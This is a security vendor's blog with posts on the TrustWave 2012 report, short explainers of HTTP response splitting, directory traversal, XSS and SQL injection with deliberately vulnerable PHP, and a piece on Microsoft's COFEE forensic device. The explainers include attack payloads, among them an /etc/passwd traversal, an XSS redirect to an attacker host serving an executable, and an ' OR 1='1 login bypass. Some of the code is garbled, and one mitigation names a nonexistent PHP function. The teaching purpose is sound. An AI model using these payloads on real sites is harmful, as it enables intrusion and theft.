SecuSolutions Blog

I’m still going through this report bit by bit, trying to take in and learn as much as I can. Today I hit on the Asia/Pacific portion of the report; but I’m not shocked by what I’m reading. It’s not the type of attack, it’s not how the attack was carried out, or even what they were after, what shocks me about this portion of the report is that it’s the same old reasons. Maybe I shouldn’t be surprised, but once again the report points out to us that it was the weakest, most ill prepared companies that took the brunt of attacks. I guess I am shocked, but in some ways I’m not. Shocked that this message isn’t clear to a lot of companies out there. That there seems to be business owners who take the least effective path thinking, “It’ll never happen to us, what are the odds?”

Clearly one assurance remains in this battle: Daily scans. Imagine getting a security update report of your data infrastructure each morning. Knowing where you stand, knowing your customers information is being protected the best way possible, knowing what you need to fix, where your weakness is and how to improve it.

I know I’m harping on this, and maybe you get the picture by now, but I know for a fact that there are still people out there that are ignoring my warnings and encouragements. Why? Well if everyone understood their security risks and wanted to do something about it, my blog wouldn’t be about the year’s latest attacks

Today’s information came from page 17 of the TrustWave Global Security report for 2012. It can be found here.

I’m still going through this security report, and for good reason: it’s showing me a lot I need to learn, a lot that everyone needs to learn.

I’m currently on the section where they discuss how criminals will go after your stored data but only if it’s easy. Typically an attack will not occur if it becomes difficult, or takes too much time. The thief just wants to get in, steal your information and get out. This is such an important fact that we need to focus on. I know it doesn’t seem all that big of a deal but it is. It shows us that with preparation, due diligence, and constant measures to increase our security that thieves will actually move along to easier targets. You can actually protect yourself just by making this not worth their time or effort.

So once again, with daily scans, security compliance, good software design, and the right mentality, you can avert a good portion of your security risks. By being more determined, better protected, and doing the diligence of good security, the results are worth it.

The information for this article can be found on page 15 of the report.

Continuing my rampage through the TrustWave Global Security report for 2012, I come across the section where they outline where “identifiable” attacks came from. It came as a little bit of a surprise to see the Russian Federation at the top of the list, second only to Unkown attacks. Let me explain how this is working. Of all attacks that could not be traced or their origins identified, they are listed as Unknown in origin. They could have come from anywhere, and we will never know. Those that could be identified, 29.6% of all attacks were from Russia, twice as many attacks as the next largest, which is the USA at 10.5%.

It’s up for interpretation as to all the things that this means. Do those countries need stricter laws? I there an encouraging factor that is breeding these attacks? Does the security in those countries need to rise? Do these regions require greater “chip & pin” technology? Are the current safeguards to personal information enough? Does better technology increase our safety or decrease it? Some good questions to consider in the coming months.

The material discussed in today’s blog can be found on page 14 of the TrustWave Global Security report for 2012.

I’m continuing my review of the TrustWave 2012 Global Security Report, and I came across something pretty important. We already know that the Food & Beverage industry made up a very large portion of attacks last year; by far the most targeted industry. But upon further reading most of those attacks happened to retail franchises that outsourced their development/maintenance services, most notably the smaller franchises. 76% of attacks were attributed to those businesses that outsourced their software and development. Another fact revealed is that those businesses that outsourced, most were not even aware of any security standard that their software developer had to adhere to.

This brings up one of the things we keep harping on here at SecuSolutions: due diligence. The daily scans? That’s due diligence. Those scans would find the holes left by the software developer and prevent them from becoming problems.

I’m going to quote the paragraph from the report below. It’s an eye opener:

“The majority of our analysis of data breach investigations – 76% – revealed that the third party responsible for system support, development and/or maintenance introduced the security deficiencies exploited by attackers. Small businesses within the food and beverage and retail industries were most often impacted by these attacks, as they typically outsource all development and support of their systems. Anecdotally, merchants were unaware of the security best practices or compliance mandates by which their partners were required to abide. In other instances, victims were unaware that this third party was only responsible for a subset of security controls – thus still leaving these systems open to attack.”

-  TrustWave Global Security Report 2012, System Administration & Responsibility, Page 10

I just stumbled across the TrustWave 2012 Global Security Report, while I’m still reading through it (it’s 65 pages), some key points are standing out about where trends have been the last year and likely where we think they are going to head. The report also has some good suggestions about security measures you can take to protect yourself, but the bottom line still remains: daily vulnerability scanning is still one huge step to proper protection and preparedness.

The report goes on to tell us that businesses in franchise chains that contain customer data are most likely to be hit. The popular focus of attacks is still customer data. When I say customer data I’m talking about personally identifiable information like mailing addresses, credit card numbers, social security information, things like that. So if you are a company of medium to large size that contains a great deal of customer info, it’s time to buckle up! This report says you are most likely to be hit by attacks.

I have to agree with the reports findings. It was well conducted and on a fundamental level, it just makes sense. Go after the information tied to the little guy, the guy that doesn’t have many resources, the guy that trusted his info to someone else. The guy who, once offered up his information for legitimate business, now has no way of erasing it, or protecting it. Now add the fact that if it’s a large business, you now have millions of peoples’ information you can get your hands on; hence the reason for attack.

If you make any resolution this year with your business, it should be for secure business practice, preparedness for your clients sake, for your reputation, and because it’s how you do good business.

The report can be found here, although you do have a small sign up form to fill out in order to download it.

HTTP Response splitting is yet another vulnerability that utilizes improper input validation/sanitization from a user.  This exploits pages which have user input directly redirected to Header information, such as redirects.

For example, here is a code for a vulnerable website

<?php

$redirurl = $_REQUEST[‘redirurl’];

header(‘Location : /goto.php?url=$redirurl’);

?>

If you send the text “top” to the redirurl parameter, the usual server response would be:

HTTP/1.1 302 Moved Temporarily

Date: Wed, 24 Dec 2003 12:53:28 GMT

Location: http://www.website.com/goto.php?url=top

Content-Type: text/html

Connection: Close

But a malicious user would utilize this un-sanitized input to his advantage and modify the HTTP Header Response. This is performed by sending a CLRF line termination, and shaping a completely different response.

For example, if a malicious user were to send the following data for the redirurl parameter:

blergh%0d%0aContent-

Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-

Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<script>alert(‘surprise’);</script>

The server would respond with:

HTTP/1.1 302 Moved Temporarily

Date: Wed, 24 Dec 2003 12:53:28 GMT

Location: http://www.website.com/goto.php?url=blergh

Content-Type: 0

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 19

<script>alert(‘surprise’)</script>

This would consequently completely alter the page, and instead of the usual content being shown, the user would have a popup box with the word ‘surprise’ written come up on their screen.

This can be even used maliciously to redirect unsuspecting users to a completely different website.

Finding every location which incorporates user input in headers may be a nightmare with a large website. SecuScan can help automate this procedure as well as looking for Directory Traversal vulnerabilities on your website on a day to day basis.

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!

A directory traversal vulnerability occurs when there is a lack of validation for user-supplied input files. This vulnerability can be used to access non-intended files stored or accessible by the server.

For example, the following is an example of vulnerable code:

First Page:

<?php

$template = ‘main.php’;

if (isset($_REQUEST[‘template’]))

$template = $_REQUEST[‘template’];

include ( “/etc/apache2/templates/” . $template );

?>

If someone were to send the following as a POST or GET request:

&template=../../../../../../etc/passwd

The user would be able to access the complete user list on the server, and brute force the password on the hacker’s local machine.  If there are sensitive files, such as unencrypted master password lists or source code on the server, then this vulnerability can cause un-repairable damage to any size of company.

With PHP this risk can be easily mitigated by normalizing characters or re-writing URI request functions to not directly pass on to a filesystem function, finding every location which incorporates the display of user-input may be a nightmare with a large website. SecuScan can help automate this procedure as well as looking for Directory Traversal vulnerabilities on your website on a day to day basis.

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!

A Cross-site scripting vulnerability occurs when – like a SQL Injection vulnerability – input validation is not correctly performed, and maliciously crafted input can change the layout of the page and/or redirect to different websites. Cross-site scripting attacks are usually performed on pages where user-input is directly displayed.

For example, the following is an example of vulnerable code:

First Page:

<form action=”search.php” method=”GET” />

Search

<input type=”text” id=”search_item” />

<input type=”submit” value=”Submit” /></form>

Second Page:

<?php echo “Search String”; echo ($_REQUEST_[‘search_item]); ?>

If someone were to send a search string such as the following:

<script>window.location=”http://www.hacker-site.com/virus.exe”;<script/>

This method can also be used maliciously to create popups, or change a website’s layout, something that can be especially detrimental when the changes are recorded in a database.

With PHP this risk can be easily mitigated using the phpentities function, but finding every location that incorporates the display of user-input may be a nightmare with a large website. SecuScan can help automate this procedure, and look for SQL Injection vulnerabilities on your website on a day to day basis.

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!

You may hear this term used frequently in articles about security incidents, but few people outside of web developers and dedicated security staff truly understand how the attack really works.

An SQL Injection attack occurs when an attacker sends a maliciously crafted request specifically designed to exploit input validation (or lack thereof) against a vulnerable website.

For example, if a login username password code is (simply) written like this:

$username = get_username_parameter();

$password = get_password_parameter();

query(“SELECT * FROM users WHERE username=’$username’ AND password=’$password’);

if(query == 1) do{ login_ok}

If a user inputs “Terry” as a username and “superman” as his/her password, the SQL query on line 3 would look like:

SELECT * FROM users  WHERE username=’Terry’ AND password=’superman’;

But as you can see, the variables $username, and $password are not validated at all, and query will accept any data that a user passes.

So if a user accidentally puts a colon somewhere in his/her username, it could break the SQL query, and would cause the webpage to throw an error. This is known as an unintentional SQL Injection.

SELECT * FROM users  WHERE username=’Te’rry’ AND password=’superman’;

But an attacker may leverage this type of code to gain access to a user account without a password. If an attacker would type in: ‘ OR 1=’1 as a password, it would rewrite the SQL query to:

SELECT * FROM users  WHERE username=’Terry’ AND password=’’ OR 1=’1’;

As you can see from the above query, the SQL server would try to match a black password, OR 1=1. Since either blank or 1=1 (which is always true) is used as a match for the password, the query will return a valid response, and the application will authenticate the attacker.

Simple input validation can mitigate this risk, but looking for these issues can be a nightmare – especially in larger web applications. SecuScan can help automate this procedure, and look for SQL Injection vulnerabilities on your website on a day to day basis.

Contact SecuSolutions at sales@secuscan.net or visit secusolutions.com for more info!

Sorry. The line was there. I had to use it. Besides, Valleywag already has the best title for this story: At Microsoft, COFEE serves you — to the police

In latest designed-to-scare-the-crap-out-of-you news, Microsoft has confirmed that it’s developed an innocuous-looking and addictively-named peripheral the size of a key fob that plugs into your computer, vacuums up a copy of everything on that computer, cracks all your passwords, decrypts all your encryption, and just generally does whatever it likes with whatever you’ve got until it’s done.

And it’s giving them away free.

That was the bad news. The good news is, they’re only giving them to the Good Guys.

The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB “thumb drive” that was quietly distributed to a handful of law-enforcement agencies last June. Microsoft General Counsel Brad Smith described its use to the 350 law-enforcement experts attending a company conference Monday.
The device contains 150 commands that can dramatically cut the time it takes to gather digital evidence…it also eliminates the need to seize a computer itself, which typically involves disconnecting from a network, turning off the power and potentially losing data. Instead, the investigator can scan for evidence on site.
More than 2,000 officers in 15 countries, including Poland, the Philippines, Germany, New Zealand and the United States, are using the device…
Smith acknowledged Microsoft’s efforts are not purely altruistic. It benefits from selling collaboration software and other technology to law-enforcement agencies, just like everybody else, he said.

Well, that should all make us feel better, no? After all, the police hardly ever lose anything important.